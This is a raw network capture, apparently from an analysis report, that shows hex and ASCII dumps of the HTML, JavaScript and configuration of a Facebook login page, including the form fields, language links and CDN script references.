                                                                                                                                  2022-10-17 20:07:09 UTC352INData Raw: 41 70 70 49 6e 76 69 74 65 73 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4f 41 75 74 68 53 68 69 6d 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 63 6f 6e 6e 65 63 74 5c 2f 6a 73 64 69 61 6c 6f 67 5c 2f 4d 50 6c 61 74 66 6f 72 6d 4c 69 6b 65 4a 53 44 69 61 6c 6f 67 5c 2f 22 3a 30 2c 22 5c 2f 71 70 5c 2f 69 6e 74 65 72 73 74 69 74 69 61 6c 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 72 65 64 69 72 65 63 74 5c 2f 22 3a 31 2c 22 5c 2f 71 70 5c 2f 61 63 74 69 6f 6e 5c 2f 63 6c 6f 73 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5c 2f 73 75 70 70 6f 72 74 5c 2f 69 6e 65 6c 69 67 69 62 6c 65 5c 2f 22 3a 31 2c 22 5c 2f 7a 65 72 6f 5f 62 61 6c 61 6e 63
                                                                                                                                  Data Ascii: AppInvitesJSDialog\/":0,"\/connect\/jsdialog\/MPlatformOAuthShimJSDialog\/":0,"\/connect\/jsdialog\/MPlatformLikeJSDialog\/":0,"\/qp\/interstitial\/":1,"\/qp\/action\/redirect\/":1,"\/qp\/action\/close\/":1,"\/zero\/support\/ineligible\/":1,"\/zero_balanc
                                                                                                                                  2022-10-17 20:07:09 UTC353INData Raw: 6e 2e 70 68 70 22 3a 31 2c 22 5c 2f 6c 6f 67 69 6e 5c 2f 22 3a 31 2c 22 5c 2f 6d 6f 62 69 6c 65 5c 2f 61 63 63 6f 75 6e 74 5c 2f 22 3a 31 2c 22 5c 2f 6e 5c 2f 22 3a 31 2c 22 5c 2f 72 65 6d 6f 74 65 5f 74 65 73 74 5f 64 65 76 69 63 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 63 6f 6e 66 69 72 6d 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 62 75 79 72 65 73 75 6c 74 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 63 6f 6e 74 69 6e 75 65 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 68 5c 2f 70 72 6f 6d 6f 73 5c 2f 22 3a 31 2c 22 5c 2f 75 70 73 65 6c 6c 5c 2f 6c 6f 61 6e 5c 2f 6c 65 61 72 6e 6d 6f
                                                                                                                                  Data Ascii: n.php":1,"\/login\/":1,"\/mobile\/account\/":1,"\/n\/":1,"\/remote_test_device\/":1,"\/upsell\/buy\/":1,"\/upsell\/buyconfirm\/":1,"\/upsell\/buyresult\/":1,"\/upsell\/promos\/":1,"\/upsell\/continue\/":1,"\/upsell\/h\/promos\/":1,"\/upsell\/loan\/learnmo
                                                                                                                                  2022-10-17 20:07:09 UTC355INData Raw: 65 72 54 69 6d 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 73 65 72 76 65 72 54 69 6d 65 22 3a 31 36 36 36 30 33 37 32 32 39 35 30 38 2c 22 74 69 6d 65 4f 66 52 65 71 75 65 73 74 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 39 34 38 37 2e 33 2c 22 74 69 6d 65 4f 66 52 65 73 70 6f 6e 73 65 53 74 61 72 74 22 3a 31 36 36 36 30 33 37 32 32 39 34 38 37 2e 33 7d 2c 35 39 34 33 5d 2c 5b 22 46 62 74 51 54 4f 76 65 72 72 69 64 65 73 22 2c 5b 5d 2c 7b 22 6f 76 65 72 72 69 64 65 73 22 3a 7b 7d 7d 2c 35 35 31 5d 2c 5b 22 41 6e 61 6c 79 74 69 63 73 43 6f 72 65 44 61 74 61 22 2c 5b 5d 2c 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 24 5e 7c 41 63 59 71 6e 33 36 33 50 74 36 4f 44 70 64 66 54 67 36 77 56 5f 71 46 4c 77 74 36 6b 6f 65 6d 72 2d 63 57 54 58 69 37 76 65 61 64 5a 2d
                                                                                                                                  Data Ascii: erTimeData",[],{"serverTime":1666037229508,"timeOfRequestStart":1666037229487.3,"timeOfResponseStart":1666037229487.3},5943],["FbtQTOverrides",[],{"overrides":{}},551],["AnalyticsCoreData",[],{"device_id":"$^|AcYqn363Pt6ODpdfTg6wV_qFLwt6koemr-cWTXi7veadZ-
                                                                                                                                  2022-10-17 20:07:09 UTC356INData Raw: 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 49 6e 74 65 72 76 61 6c 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33 42 34 38 74 6f 30 75 41 44 70 6a 51 36 42 75 76 34 63 45 66 53 76 6c 6a 77 51 69 6b 6b 53 71 6b 62 54 5a 37 57 36 47 6e 52 48 49 52 41 58 69 4c 77 45 55 6e 4f 35 36 69 68 47 6c 45 62 50 64 37 35 50 45 78 33 37 76 53 6f 33 61 59 78 7a 61 4f 50 6f 67 7a 4c 5a 62 34 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 36 36 33 33 22 2c 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 5d 2c 7b 22 5f 5f 72 63 22 3a 5b 22 73 65 74 54 69 6d 65 6f 75 74 41 63 72 6f 73 73 54 72 61 6e 73 69 74 69 6f 6e 73 42 6c 75 65 22 2c 22 41 61 33
                                                                                                                                  Data Ascii: nsitionsBlue"],{"__rc":["setIntervalAcrossTransitionsBlue","Aa3B48to0uADpjQ6Buv4cEfSvljwQikkSqkbTZ7W6GnRHIRAXiLwEUnO56ihGlEbPd75PEx37vSo3aYxzaOPogzLZb4"]},-1],["cr:986633",["setTimeoutAcrossTransitionsBlue"],{"__rc":["setTimeoutAcrossTransitionsBlue","Aa3
                                                                                                                                  2022-10-17 20:07:09 UTC357INData Raw: 50 6f 69 6e 74 65 72 4d 6f 76 65 22 3a 31 30 30 30 30 2c 22 6b 65 79 64 6f 77 6e 22 3a 30 2e 31 2c 22 63 6c 69 63 6b 22 3a 30 2e 30 32 2c 22 6d 6f 75 73 65 75 70 22 3a 30 2e 30 32 2c 22 5f 5f 31 30 30 6d 73 22 3a 30 2e 30 30 31 2c 22 5f 5f 64 65 66 61 75 6c 74 22 3a 35 30 30 30 2c 22 5f 5f 6d 69 6e 22 3a 31 30 30 2c 22 5f 5f 69 6e 74 65 72 61 63 74 69 6f 6e 44 65 66 61 75 6c 74 22 3a 32 30 30 2c 22 5f 5f 65 76 65 6e 74 44 65 66 61 75 6c 74 22 3a 31 30 30 30 30 30 7d 2c 22 70 61 67 65 5f 73 61 6d 70 6c 69 6e 67 5f 62 6f 6f 73 74 22 3a 31 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 72 65 67 65 78 65 73 22 3a 7b 7d 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 5f 62 6f 6f 73 74 22 3a 7b 7d 2c 22 65 76 65 6e 74 5f 74 79 70 65 73 22 3a 7b 7d 2c 22 6d 61 6e 75 61 6c 5f
                                                                                                                                  Data Ascii: PointerMove":10000,"keydown":0.1,"click":0.02,"mouseup":0.02,"__100ms":0.001,"__default":5000,"__min":100,"__interactionDefault":200,"__eventDefault":100000},"page_sampling_boost":1,"interaction_regexes":{},"interaction_boost":{},"event_types":{},"manual_
                                                                                                                                  2022-10-17 20:07:09 UTC359INData Raw: 35 61 20 62 5f 63 33 70 79 6e 2d 61 68 68 20 63 68 72 6f 6d 65 20 77 65 62 6b 69 74 20 77 69 6e 20 78 31 20 4c 6f 63 61 6c 65 5f 65 6e 5f 55 53 22 20 64 69 72 3d 22 6c 74 72 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6e 6f 6e 63 65 3d 22 42 67 54 73 38 71 46 4d 22 3e 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 62 6f 6f 74 73 74 72 61 70 57 65 62 53 65 73 73 69 6f 6e 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6a 29 7b 6a 28 31 36 36 36 30 33 37 32 32 39 29 7d 29 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 6c 69 22 20 69 64 3d 22 75 5f 30 5f 30 5f 6f 6b 22 3e 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 43 6f 6e 74 61 69 6e 65 72 22 20 63 6c 61 73 73 3d 22 75 69 43 6f 6e 74 65 78 74 75 61
                                                                                                                                  Data Ascii: 5a b_c3pyn-ahh chrome webkit win x1 Locale_en_US" dir="ltr"><script type="text/javascript" nonce="BgTs8qFM">requireLazy(["bootstrapWebSession"],function(j){j(1666037229)})</script><div class="_li" id="u_0_0_ok"><div id="globalContainer" class="uiContextua
                                                                                                                                  2022-10-17 20:07:09 UTC360INData Raw: 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 64 69 73 70 6c 61 79 22 20 6e 61 6d 65 3d 22 64 69 73 70 6c 61 79 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 69 73 70 72 69 76 61 74 65 22 20 6e 61 6d 65 3d 22 69 73 70 72 69 76 61 74 65 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 69 64 3d 22 72 65 74 75 72 6e 5f 73 65 73 73 69 6f 6e 22 20 6e 61 6d 65 3d 22 72 65 74 75 72 6e 5f 73 65 73 73 69 6f 6e 22 20 76 61 6c 75 65 3d 22 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70
                                                                                                                                  Data Ascii: e="hidden" autocomplete="off" id="display" name="display" value="" /><input type="hidden" autocomplete="off" id="isprivate" name="isprivate" value="" /><input type="hidden" autocomplete="off" id="return_session" name="return_session" value="" /><input typ
                                                                                                                                  2022-10-17 20:07:09 UTC362INData Raw: 78 6b 74 22 3e 3c 62 75 74 74 6f 6e 20 76 61 6c 75 65 3d 22 31 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 32 65 30 20 5f 34 6a 79 36 20 5f 34 6a 79 31 20 73 65 6c 65 63 74 65 64 20 5f 35 31 73 79 22 20 69 64 3d 22 6c 6f 67 69 6e 62 75 74 74 6f 6e 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 20 49 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 5f 78 6b 76 20 66 73 6d 20 66 77 6e 20 66 63 67 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 6c 69 6e 6b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 72 65 63 6f 76 65 72 2f 69 6e 69 74 69 61 74 65 2f 3f 61 72 73
                                                                                                                                  Data Ascii: xkt"><button value="1" class="_42ft _4jy0 _52e0 _4jy6 _4jy1 selected _51sy" id="loginbutton" name="login" tabindex="0" type="submit">Log In</button></div><div class="_xkv fsm fwn fcg" id="login_link"><a href="https://www.facebook.com/recover/initiate/?ars
                                                                                                                                  2022-10-17 20:07:09 UTC363INData Raw: 72 79 7b 62 26 26 21 62 2e 76 61 6c 75 65 3f 62 2e 66 6f 63 75 73 28 29 3a 63 26 26 63 2e 66 6f 63 75 73 28 29 7d 63 61 74 63 68 28 61 29 7b 69 66 28 21 28 61 2e 6e 75 6d 62 65 72 3d 3d 2d 32 31 34 36 38 32 36 31 37 38 29 29 74 68 72 6f 77 20 61 7d 72 65 74 75 72 6e 20 61 26 26 61 2e 63 61 6c 6c 28 77 69 6e 64 6f 77 29 7d 7d 28 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 29 3b 66 75 6e 63 74 69 6f 6e 20 70 6f 70 28 61 29 7b 77 69 6e 64 6f 77 2e 6f 70 65 6e 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 72 65 6c 6f 61 64 5f 6f 6e 5f 6e 65 77 5f 63 6f 6f 6b 69 65 28 61 29 7b 66 75 6e 63 74 69 6f 6e 20 62 28 61 29 7b 61 3d 6e 65 77 20 52 65 67 45 78 70 28 61 2b 22 3d 28 2e 2a 3f 29 28 3b 7c 24 29 22 29 3b 72 65 74 75 72 6e 20 61 2e 74 65 73 74 28 64 6f 63 75 6d 65 6e 74
                                                                                                                                  Data Ascii: ry{b&&!b.value?b.focus():c&&c.focus()}catch(a){if(!(a.number==-2146826178))throw a}return a&&a.call(window)}}(window.onload);function pop(a){window.open(a)}function reload_on_new_cookie(a){function b(a){a=new RegExp(a+"=(.*?)(;|$)");return a.test(document
                                                                                                                                  2022-10-17 20:07:09 UTC365INData Raw: 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 66 72 5f 46 52 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 66 72 2d 66 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 75 30 30 32 35 32 46
                                                                                                                                  Data Ascii: om%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;fr_FR&quot;, &quot;en_US&quot;, &quot;https:\/\/fr-fr.facebook.com\/login.php?next=https\u00253A\u00252F\u00252Fwww.facebook.com\u00252F
                                                                                                                                  2022-10-17 20:07:09 UTC366INData Raw: 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 6c 74 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 71 2d 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 73 71 5f 41 4c 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74
                                                                                                                                  Data Ascii: ss="_sv4" dir="ltr" href="https://sq-al.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLocale(&quot;sq_AL&quot;, &quot;en_US&quot;, &quot;ht
                                                                                                                                  2022-10-17 20:07:09 UTC368INData Raw: 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 54 75 72 6b 69 73 68 22 3e 54 c3 bc 72 6b c3 a7 65 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 73 76 34 22 20 64 69 72 3d 22 72 74 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 2d 61 72 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 6e 65 78 74 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 25 32 46 61 64 73 25 32 46 6d 61 6e 61 67 65 72 25 32 46 61 63 63 6f 75 6e 74 5f 73 65 74 74 69 6e 67 73 25 32 46 61 63 63 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61
                                                                                                                                  Data Ascii: lse;" title="Turkish">Trke</a></li><li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing" onclick="require(&quot;IntlUtils&quot;).setCookieLoca
                                                                                                                                  2022-10-17 20:07:09 UTC369INData Raw: 6f 75 6e 74 5f 62 69 6c 6c 69 6e 67 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 26 71 75 6f 74 3b 2c 20 39 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 20 74 69 74 6c 65 3d 22 53 69 6d 70 6c 69 66 69 65 64 20 43 68 69 6e 65 73 65 20 28 43 68 69 6e 61 29 22 3e e4 b8 ad e6 96 87 28 e7 ae 80 e4 bd 93 29 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 72 6f 6c 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 31 37 69 20 5f 35 31 37 68 20 5f 35 31 73 79 22 20 72 65 6c 3d 22 64 69 61 6c 6f 67 22 20 61 6a 61 78 69 66 79 3d 22 2f 73 65 74 74 69 6e 67 73 2f 6c 61 6e 67 75 61 67 65 2f 6c 61 6e 67 75 61 67 65 2f 3f 75 72 69 3d 68 74 74 70 73 25 33 41 25 32 46 25 32
                                                                                                                                  Data Ascii: ount_billing&quot;, &quot;www_list_selector&quot;, 9); return false;" title="Simplified Chinese (China)">()</a></li><li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog" ajaxify="/settings/language/language/?uri=https%3A%2F%2
                                                                                                                                  2022-10-17 20:07:09 UTC371INData Raw: 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 4f 63 75 6c 75 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6f 72 74 61 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f 75 74 20 46 61 63 65 62 6f 6f 6b 20 50 6f 72 74 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 50 6f 72 74 61 6c 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 69 6e 73 74 61 67 72 61 6d 2e 63 6f 6d 25 32 46 26 61 6d 70 3b 68 3d 41 54 33 62 73 5f 33 62 33 6f 72 6f 70 61 69 4e 69 7a 48 69 68 4b 31
                                                                                                                                  Data Ascii: target="_blank">Oculus</a></li><li><a href="https://portal.facebook.com/" title="Learn more about Facebook Portal" target="_blank">Portal</a></li><li><a href="https://l.facebook.com/l.php?u=https%3A%2F%2Fwww.instagram.com%2F&amp;h=AT3bs_3b3oropaiNizHihK1
                                                                                                                                  2022-10-17 20:07:09 UTC372INData Raw: 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 44 65 76 65 6c 6f 70 20 6f 6e 20 6f 75 72 20 70 6c 61 74 66 6f 72 6d 2e 22 3e 44 65 76 65 6c 6f 70 65 72 73 0d 0a
                                                                                                                                  Data Ascii: li><a href="https://developers.facebook.com/?ref=pf" title="Develop on our platform.">Developers
                                                                                                                                  2022-10-17 20:07:09 UTC372INData Raw: 36 66 38 38 0d 0a 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 63 61 72 65 65 72 73 2f 3f 72 65 66 3d 70 66 22 20 74 69 74 6c 65 3d 22 4d 61 6b 65 20 79 6f 75 72 20 6e 65 78 74 20 63 61 72 65 65 72 20 6d 6f 76 65 20 74 6f 20 6f 75 72 20 61 77 65 73 6f 6d 65 20 63 6f 6d 70 61 6e 79 2e 22 3e 43 61 72 65 65 72 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 2f 70 72 69 76 61 63 79 2f 70 6f 6c 69 63 79 2f 3f 65 6e 74 72 79 5f 70 6f 69 6e 74 3d 66 61 63 65 62 6f 6f 6b 5f 70 61 67 65 5f 66 6f 6f 74 65 72 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 79 6f 75 72 20 70 72 69 76 61 63 79 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76
                                                                                                                                  Data Ascii: 6f88</a></li><li><a href="/careers/?ref=pf" title="Make your next career move to our awesome company.">Careers</a></li><li><a data-nocookies="1" href="/privacy/policy/?entry_point=facebook_page_footer" title="Learn about your privacy and Facebook.">Priv
                                                                                                                                  2022-10-17 20:07:09 UTC374INData Raw: 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 28 7b 22 62 78 44 61 74 61 22 3a 7b 22 38 37 35 32 33 31 22 3a 7b 22 75 72 69 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 79 44 5c 2f 72 5c 2f 64 34 5a 49 56 58 2d 35 43 2d 62 2e 69 63 6f 22 7d 7d 2c 22 63 6c 70 44 61 74 61 22 3a 7b 22 31 37 34 36 33 39 37 22 3a 7b 22 72 22 3a 31 2c 22 73 22 3a 31 7d 7d 2c 22 67 6b 78 44 61 74 61 22 3a 7b 22 34 31 36 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 79 72 62 35 51 75 51 39 32 37 33 36 75 4b 65 49 22 7d 2c 22 35 38 38 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 54
                                                                                                                                  Data Ascii: n(m){m.handle({"bxData":{"875231":{"uri":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/yD\/r\/d4ZIVX-5C-b.ico"}},"clpData":{"1746397":{"r":1,"s":1}},"gkxData":{"4166":{"result":false,"hash":"AT7yrb5QuQ92736uKeI"},"588":{"result":true,"hash":"AT7B-2KeH1gOOVfLT
                                                                                                                                  2022-10-17 20:07:09 UTC375INData Raw: 73 68 22 3a 22 41 54 36 64 49 42 69 56 76 39 62 55 44 58 6c 6d 48 77 63 22 7d 2c 22 31 39 38 35 39 34 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 36 36 4f 6f 35 6c 59 5f 5f 35 77 55 54 70 44 79 6b 22 7d 2c 22 35 35 34 31 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 37 30 56 2d 51 5f 7a 66 45 79 6b 7a 6e 4f 30 46 67 22 7d 2c 22 31 30 39 39 38 39 33 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 35 6b 6c 79 32 4c 53 5a 56 5f 44 4b 47 52 71 4e 59 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 2c 22 71 70 6c 44 61 74 61 22 3a 7b 22 38 39 31 22 3a 7b
                                                                                                                                  Data Ascii: sh":"AT6dIBiVv9bUDXlmHwc"},"1985945":{"result":true,"hash":"AT66Oo5lY__5wUTpDyk"},"5541":{"result":true,"hash":"AT70V-Q_zfEykznO0Fg"},"1099893":{"result":false,"hash":"AT5kly2LSZV_DKGRqNY"}},"qexData":{"644":{"r":null},"647":{"r":null}},"qplData":{"891":{
                                                                                                                                  2022-10-17 20:07:09 UTC377INData Raw: 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 67 5c 2f 72 5c 2f 6c 5f 64 45 45 6c 4a 69 42 43 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 52 30 72 48 69 64 4c 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 47 5c 2f 72 5c 2f 2d 4d 45 4a 79 49 32 56 48 6e 6f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 7d 2c 22 6a 54 58 64 48 33 65 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72
                                                                                                                                  Data Ascii: tic.xx.fbcdn.net\/rsrc.php\/v3\/yg\/r\/l_dEElJiBCo.js?_nc_x=Ij3Wp8lg5Kz"},"R0rHidL":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yG\/r\/-MEJyI2VHno.js?_nc_x=Ij3Wp8lg5Kz"},"jTXdH3e":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsr
